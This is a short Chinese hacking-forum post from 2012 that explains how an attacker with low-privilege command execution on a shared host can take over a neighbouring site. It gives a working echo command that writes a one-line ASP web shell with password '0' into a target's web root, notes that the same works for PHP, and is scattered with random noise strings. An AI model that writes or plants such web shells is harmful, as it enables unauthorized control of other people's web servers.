在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。9 x" k R; ?) O+ B" o. j6 b
4 g: W) k* ~4 |9 m- `+ K
命令格式
& q/ Y$ |8 E0 [) H( U: {5 p5 T: ~& R% n* h' L( w( X- r
Echo 语句 >目标站绝对目录/ q6 S& Z. r' K
! n% \+ ?8 j+ `9 t5 C6 N* }( d
例如: + k7 H/ I Y2 x- Q$ [
& V) n6 r. W" {" x+ C2 w" ~" Lecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
3 S A& B; x. e0 s, j6 Q0 b% i5 _4 u6 C4 y/ T
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
+ r; Q' ^/ N& z4 G% c |
发表于 2012-9-23 14:40:24
收藏
支持
反对